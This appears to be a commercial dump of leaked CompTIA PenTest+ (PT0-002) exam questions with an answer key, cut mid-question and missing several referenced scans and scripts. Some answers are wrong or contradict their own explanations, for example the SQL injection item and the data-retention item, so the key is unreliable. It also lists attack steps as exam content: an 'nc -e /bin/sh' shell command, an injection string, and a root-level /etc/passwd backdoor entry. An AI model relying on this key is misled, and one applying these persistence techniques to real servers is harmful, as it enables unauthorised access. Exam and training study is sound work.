bind shell to pass the hash and WMI for persistence. D. Use Mimikatz to pass the hash and PsExec for persistence. Answer: D Explanation: Mimikatz is a credential hacking tool that can be used to extract logon passwords from the LSASS process and pass them to other systems. Once the tester has the hashes, they can then use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system and authenticate with the new credentials. This provides the tester with persistence on the system, allowing them to access it even after a reboot. "A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass- the-hash capability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186) NEW QUESTION 190 Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement? A. MSA B. NDA C. SOW D. ROE Answer: B NEW QUESTION 192 Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? A. Analyze the malware to see what it does. B. Collect the proper evidence and then remove the malware. C. Do a root-cause analysis to find out how the malware got in. D. Remove the malware immediately. E. Stop the assessment and inform the emergency contact. Answer: E NEW QUESTION 197 The results of an Nmap scan are as follows: The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) Which of the following would be the BEST conclusion about this device? A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory. B. This device is most likely a gateway with in-band management services. C. This device is most likely a proxy server forwarding requests over TCP/443. D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation. Answer: B Explanation: The heart bleed bug is an open ssl bug which does not affect SSH Ref: https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh NEW QUESTION 201 A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity? A. /var/log/messages B. /var/log/last_user C. /var/log/user_log D. /var/log/lastlog Answer: D Explanation: The /var/log/lastlog file is a log file that stores information about the last user to sign in to the server. This file stores information such as the username, IP address, and timestamp of the last user to sign in to the server. It can be used by a penetration tester to determine the identity of the last user who signed in to the web server, which can be helpful in identifying the user who may have set up the backdoors and other malicious activities. NEW QUESTION 202 A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action? A. ROE B. SLA C. MSA D. NDA Answer: D NEW QUESTION 203 A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take? A. Segment the firewall from the cloud. B. Scan the firewall for vulnerabilities. C. Notify the client about the firewall. D. Apply patches to the firewall. Answer: C NEW QUESTION 206 An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? A. A list B. A tree C. A dictionary D. An array The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) Answer: C Explanation: data structures are used to store data in an organized form, and some data structures are more efficient and suitable for certain operations than others. For example, hash tables, skip lists and jump lists are some dictionary data structures that can insert and access elements efficiently3. For string comparison, there are different algorithms that can measure how similar two strings are, such as Levenshtein distance, Hamming distance or Jaccard similarity4. Some of these algorithms can be implemented using data structures such as arrays or hashtables5. NEW QUESTION 207 A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers? A. Redact identifying information and provide a previous customer's documentation. B. Allow the client to only view the information while in secure spaces. C. Determine which reports are no longer under a period of confidentiality. D. Provide raw output from penetration testing tools. Answer: C Explanation: Penetration testing reports contain sensitive information about the vulnerabilities and risks of a customer’s systems and networks. Therefore, penetration testers should respect the confidentiality and privacy of their customers and only share their reports with authorized parties. Penetration testers should also follow the terms and conditions of their contracts with their customers, which may include a period of confidentiality that prohibits them from disclosing any information related to the testing without the customer’s consent. NEW QUESTION 212 Given the following script: Which of the following BEST characterizes the function performed by lines 5 and 6? A. Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10 B. Performs a single DNS query for www.comptia.org and prints the raw data output C. Loops through variable b to count the results returned for the DNS query and prints that count to screen D. Prints each DNS query result already stored in variable b Answer: D NEW QUESTION 216 A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose? A. Nmap B. Nikto C. Cain and Abel D. Ethercap Answer: B Explanation: https://hackertarget.com/nikto-website-scanner/ NEW QUESTION 219 A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field: 1;SELECT Username, Password FROM Users; Which of the following injection attacks is the penetration tester using? A. Blind SQL B. Boolean SQL The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) C. Stacked queries D. Error-based Answer: D NEW QUESTION 221 A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running? A. CentOS B. Arch Linux C. Windows Server D. Ubuntu Answer: C NEW QUESTION 225 A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan? A. nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan B. nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan C. nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan D. nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan Answer: C NEW QUESTION 226 A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT? A. Halt the penetration test. B. Contact law enforcement. C. Deconflict with the penetration tester. D. Assume the alert is from the penetration test. Answer: B NEW QUESTION 230 Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully? A. The IP address is wrong. B. The server is unreachable. C. The IP address is on the blocklist. D. The IP address is on the allow list. Answer: C Explanation: The most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked. NEW QUESTION 235 A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client’s requirements? A. “cisco-ios” “admin+1234” B. “cisco-ios” “no-password” C. “cisco-ios” “default-passwords” D. “cisco-ios” “last-modified” Answer: B NEW QUESTION 239 The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? A. Uncover potential criminal activity based on the evidence gathered. B. Identify all the vulnerabilities in the environment. C. Limit invasiveness based on scope. D. Maintain confidentiality of the findings. Answer: C NEW QUESTION 243 A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify? A. Weak authentication schemes B. Credentials stored in strings C. Buffer overflows D. Non-optimized resource management Answer: C Explanation: fuzzing introduces unexpected inputs into a system and watches to see if the system has any negative reactions to the inputs that indicate security, performance, or quality gaps or issues NEW QUESTION 248 Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff? A. A quick description of the vulnerability and a high-level control to fix it B. Information regarding the business impact if compromised C. The executive summary and information regarding the testing company D. The rules of engagement from the assessment Answer: A Explanation: The systems administrator and the technical stuff would be more interested in the technical aspect of the findings NEW QUESTION 249 A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test? A. Add a web shell to the root of the website. B. Upgrade the reverse shell to a true TTY terminal. C. Add a new user with ID 0 to the /etc/passwd file. D. Change the password of the root user and revert after the test. Answer: C Explanation: The best option for the penetration tester to maintain root-level persistence on this server during the test is to add a new user with ID 0 to the /etc/passwd file. This will allow the penetration tester to use the same user account as the other user, but with root privileges, meaning that it won’t disrupt the other user’s work. This can be done by adding a new line with the username and the numerical user ID 0 to the /etc/passwd file. For example, if the username for the other user is “johndoe”, the line to add would be “johndoe:x:0:0:John Doe:/root:/bin/bash”. After the user is added, the penetration tester can use the “su” command to switch to the new user and gain root privileges. NEW QUESTION 254 A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective? A. Create a one-shot system service to establish a reverse shell. B. Obtain /etc/shadow and brute force the root password. C. Run the nc -e /bin/sh command. D. Move laterally to create a user account on LDAP Answer: A Explanation: https://hosakacorp.net/p/systemd-user.html NEW QUESTION 255 During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout? The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) A. Mask B. Rainbow C. Dictionary D. Password spraying Answer: D NEW QUESTION 260 An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information? A. Follow the established data retention and destruction process B. Report any findings to regulatory oversight groups C. Publish the findings after the client reviews the report D. Encrypt and store any client information for future analysis Answer: D Explanation: After completing an assessment and providing the report and evidence to the client, it is important to follow the established data retention and destruction process to ensure the confidentiality of the client's information. This process typically involves securely deleting or destroying any data collected during the assessment that is no longer needed, and securely storing any data that needs to be retained. This helps to prevent unauthorized access to the client's information and protects the client's confidentiality. Reporting any findings to regulatory oversight groups may be necessary in some cases, but it should be done only with the client's permission and in accordance with any relevant legal requirements. Publishing the findings before the client has reviewed the report is also not recommended, as it may breach the client's confidentiality and damage their reputation. Encrypting and storing client information for future analysis is also not recommended unless it is necessary and in compliance with any legal or ethical requirements. NEW QUESTION 264 A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: The following request was intercepted going to the network device: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk Network management interfaces are available on the production network. An Nmap scan returned the following: Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.) A. Enforce enhanced password complexity requirements. B. Disable or upgrade SSH daemon. C. Disable HTTP/301 redirect configuration. D. Create an out-of-band network for management. E. Implement a better method for authentication. F. Eliminate network management and control interfaces. Answer: CD NEW QUESTION 266...... The Leader of IT Certification visit - https://www.certleader.com 100% Valid and Newest Version PT0-002 Questions & Answers shared by Certleader https://www.certleader.com/PT0-002-dumps.html (253 Q&As) Thank You for Trying Our Product * 100% Pass or Money Back All our products come with a 90-day Money Back Guarantee. * One year free update You can enjoy free update one year. 24x7 online support. * Trusted by Millions We currently serve more than 30,000,000 customers. * Shop Securely All transactions are protected by VeriSign! 100% Pass Your PT0-002 Exam with Our Prep Materials Via below: https://www.certleader.com/PT0-002-dumps.html The Leader of IT Certification visit - https://www.certleader.com Powered by TCPDF (www.tcpdf.org)
